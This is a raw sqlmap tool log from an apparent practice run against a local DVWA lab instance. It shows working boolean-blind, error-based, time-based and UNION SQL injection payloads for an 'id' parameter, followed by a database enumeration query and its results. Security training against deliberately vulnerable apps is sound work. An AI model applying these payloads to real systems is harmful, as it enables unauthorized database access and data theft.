        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.10.5#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:13:55 /2025-10-25/

[00:13:55] [DEBUG] cleaning up configuration parameters
[00:13:55] [DEBUG] setting the HTTP timeout
[00:13:55] [DEBUG] setting the HTTP Cookie header
[00:13:55] [DEBUG] setting the HTTP User-Agent header
[00:13:55] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\PC\sqlmap\data\txt\user-agents.txt'
[00:13:55] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36' from file 'C:\Users\PC\sqlmap\data\txt\user-agents.txt'
[00:13:55] [DEBUG] creating HTTP requests opener object
[00:13:55] [DEBUG] setting the HTTP Referer header to the target URL
[00:13:55] [DEBUG] provided parameter 'id' is not inside the Cookie
[00:13:55] [INFO] resuming back-end DBMS 'mysql' 
[00:13:55] [DEBUG] resolving hostname 'localhost'
[00:13:55] [INFO] testing connection to the target URL
[00:13:56] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: id=1' AND 2986=(SELECT (CASE WHEN (2986=2986) THEN 2986 ELSE (SELECT 6050 UNION SELECT 4652) END))-- -&Submit=Submit
    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9765 FROM(SELECT COUNT(*),CONCAT(0x717a767671,(SELECT (ELT(9765=9765,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ymOH&Submit=Submit
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2942 FROM (SELECT(SLEEP(5)))uVMT)-- nPfq&Submit=Submit
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x717a767671,0x7742475742536f6d45724d507a7766496e66446c6d6f484a6a6b4e6d4c5a4b515166626b586d4245,0x716b6b6b71)-- -&Submit=Submit
    Vector:  UNION ALL SELECT NULL,[QUERY]-- -
---
[00:13:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[00:13:57] [INFO] fetching database names
[00:13:57] [DEBUG] resuming configuration option 'string' ('DB')
[00:13:57] [PAYLOAD] 1' UNION ALL SELECT NULL,CONCAT(0x717a767671,JSON_ARRAYAGG(CONCAT_WS(0x6b6c6f787870,IFNULL(CAST(schema_name AS NCHAR),0x20))),0x716b6b6b71) FROM INFORMATION_SCHEMA.SCHEMATA-- -
[00:13:58] [DEBUG] performed 1 query in 1.02 seconds
available databases [2]:
[*] dvwa
[*] information_schema

[00:13:58] [INFO] fetched data logged to text files under 'C:\Users\PC\AppData\Local\sqlmap\output\localhost'

[*] ending @ 00:13:58 /2025-10-25/

